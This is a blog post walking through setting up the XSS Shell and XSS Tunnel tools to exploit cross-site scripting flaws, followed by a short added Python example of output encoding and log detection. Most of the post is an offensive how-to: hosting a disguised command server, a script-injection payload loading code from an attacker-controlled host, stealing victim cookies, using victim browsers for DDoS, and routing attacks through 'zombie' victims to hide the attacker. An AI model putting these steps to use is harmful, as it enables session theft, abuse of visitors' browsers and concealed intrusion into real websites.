Posted By Maher Bro
TAKING COMMON XSS VULNERABILITIES TO THE NEXT LEVEL
Hey all, today I will tell you about two neat tools which can be used to leverage common XSS vulnerabilities and take them to the next level. There are a lot of admins and general techies who don't think XSS vulnerabilities are anything to be concerned about. What can a simple alert box do? Hopefully after today you will look at your code a little harder and have a little more respect for all those pesky XSS finds. This is based on my recent experience in setting these up and seeing the results in real time, which led me to feel the need to share this. Here we go.
Things you need
XSS Shell & XSS Tunnel, both available here in single download
 
Path Disclosure Script, available here
Create an account at any of your favorite ASP hosting sites; usually a free one will do. Now create and upload an index file to have something for quick checks to see if anything is there (and to throw off suspicion) so your site seems legit. Next, upload the Path Disclosure Script you downloaded above (path.asp) and navigate to it in your browser to find out what the default install path is, so we can set up the db.asp file for connections to our MS-ACCESS database file.

Once that is done, create a zip file of all the content in the XSS Shell folder and name it SSX.zip. Then use your control panel features to unzip the content to speed up the XSS Shell site build-out (otherwise it takes forever to upload the files one by one).

Write down what you see on the screen, remove the file, and then edit db.asp for XSS Shell, changing the path in the following line of code to what you found above:
'// DATABASE CONFIGURATION
Const DBPATH = "X:\path\to\site\install"


Remove the .zip file and the path finder script to clean things up, so it should look something like this once done:

NOTE: on my host in this test run the "DB" folder was changed to "Db" and the "admin" folder was changed to "Admin", so you may need to alter your scripts after uploading; just play with it a bit until it works for you. Also note that you might need to alter the scripts so the paths match what the control panel reflects, since your URL path may be case sensitive, as in my case.
Now that you have everything uploaded it is time to navigate to the admin panel, you should be able to find it easily at:

You will log in with whatever password you set originally in the xssshell.asp file. Once you log in you are greeted with the XSS Shell admin panel.

OK, so things work; now to get some victims. If you want to test it out real quick you can upload the Sample_Victim folder that comes with the XSS Shell download. Just edit the code in the middle of the page (comments point it out) and change it to point to your new XSS Shell setup. Once completed, open up another browser and navigate to the /Sample_Victim/Default.asp page to activate it. Alternatively you can get straight to work by injecting a form of this script into an XSS vulnerable site and then getting victims to visit:
"><script src="http://yoursite.com/xssshellifany/xssshell.asp"></script>
When you get victims they will appear in the XSS Shell Admin Panel, like so:

From here you can grab victim cookies, send alert boxes to all victims at once, use victim browsers for DDoS, etc. If you are good with JavaScript you can do whatever your skills allow, as you can add your own custom commands and payloads rather easily under the eval(js) module section. If you want to know more about XSS Shell then please refer to the developer's site, as I will now be jumping onward into how we can use XSS Shell with XSS Tunnel to create a zombie bot for further attacking, exploiting, whatever.
XSS Shell homepage can be found here, and download includes both XSS Shell and XSS Tunnel:  http://labs.portcullis.co.uk/application/xssshell/
OK, now that we have XSS Shell successfully set up we can extend its usefulness even further with the help of another tool called XSS Tunnel. This is a binary program made strictly for Windows. You simply need to download it, open it, and configure it to use our XSS Shell, which then routes all the traffic we want through our XSS Shell victims as proxies. This can allow us to bypass IP restrictions should we grab an admin victim, which can then lead to further privilege escalation from the site admin panel. It also means we can turn our victims into zombies and configure our favorite injection scanners, browsers, etc. to use the zombie victim as a proxy, meaning all logs on any servers we attack while connected will reflect our zombie's information and not ours, adding yet another layer of stealth to our future exploitations.
Here is a quick run-through of the XSS Tunnel configuration. Double click the file to run it and you're greeted with this:

We will need to click on the "OPTIONS" tab to enter our details for connecting to XSS Shell. Simply enter the URL path to your XSS Shell Admin panel, and then enter the password you created for the XSS Shell Admin Panel (the xssshell.asp file stores the password if you already forgot).

You can hit the "TEST SERVER" button once you have entered the correct details to check and confirm it is properly communicating with our XSS Shell. Upon success you will see a message like so:

Now, once you get victims in your XSS Shell you can use them as proxies for your favorite tools and/or to bypass site restrictions for further exploitation on the site where the original XSS flaw was found. To do this, choose the interface or adapter you want to listen on and then choose the desired port to listen on and use for proxy functions. If you have something running on 8080 already then just change it to meet your needs. The Transparency setting is purely for the XSS Tunnel GUI and has nothing to do with the proxy function. Once you have it how you want, click on the "START XSS TUNNEL" button near the top section; once you then enable the proxy function in your tools you will begin to see the requests flow through the main tab (if you care to watch or review).

This method can take a common non-persistent or persistent XSS vulnerability and turn it into a full site takeover, proving that XSS is not something to be simply overlooked.
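As an added example (not from the original post or the XSS Shell project), here is the defender's side of the payload shown above: the attribute breakout fails once the reflected value is HTML-encoded, and the same request shape can be flagged in web server access logs. The page functions, log lines and IP addresses are constructed for illustration.

```python
import html
import re
from urllib.parse import unquote

# Payload of the shape the post injects into a reflected parameter (constructed copy).
PAYLOAD = '"><script src="http://yoursite.com/xssshellifany/xssshell.asp"></script>'

def render_unsafe(query: str) -> str:
    """Reflects user input into an attribute value without encoding (the flaw)."""
    return f'<input type="text" name="q" value="{query}">'

def render_safe(query: str) -> str:
    """Same page with HTML attribute encoding: quotes and angle brackets become entities."""
    return f'<input type="text" name="q" value="{html.escape(query, quote=True)}">'

def loads_remote_script(page: str) -> bool:
    """True if the rendered HTML contains a real <script> element with a src attribute."""
    return re.search(r'<script[^>]*\bsrc\s*=', page, re.IGNORECASE) is not None

# Detection side: a <script src=...> pointing at an external host inside a request line.
REMOTE_SCRIPT = re.compile(r'<script[^>]*\bsrc\s*=\s*["\']?\s*(?:https?:)?//', re.IGNORECASE)

def flag_requests(log_lines):
    """Return client IPs of requests whose URL-decoded request line carries a remote script tag."""
    hits = []
    for line in log_lines:
        parts = line.split('"')
        if len(parts) < 2:
            continue
        request = parts[1]          # e.g. 'GET /search.asp?q=... HTTP/1.1'
        if REMOTE_SCRIPT.search(unquote(request)):
            hits.append(line.split()[0])
    return hits

# Constructed common-log-format lines, not real traffic; the first carries the URL-encoded payload.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2010:13:55:36 -0700] "GET /search.asp?q=%22%3E%3Cscript%20src%3D%22http%3A%2F%2Fyoursite.com%2Fxssshellifany%2Fxssshell.asp%22%3E%3C%2Fscript%3E HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Oct/2010:13:56:01 -0700] "GET /search.asp?q=shoes HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    print("unsafe page loads remote script:", loads_remote_script(render_unsafe(PAYLOAD)))
    print("encoded page loads remote script:", loads_remote_script(render_safe(PAYLOAD)))
    print("flagged clients:", flag_requests(SAMPLE_LOG))
```

Encoding on output is the fix for the flaw itself; the log check only tells you someone tried it and is no substitute for the fix.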
 
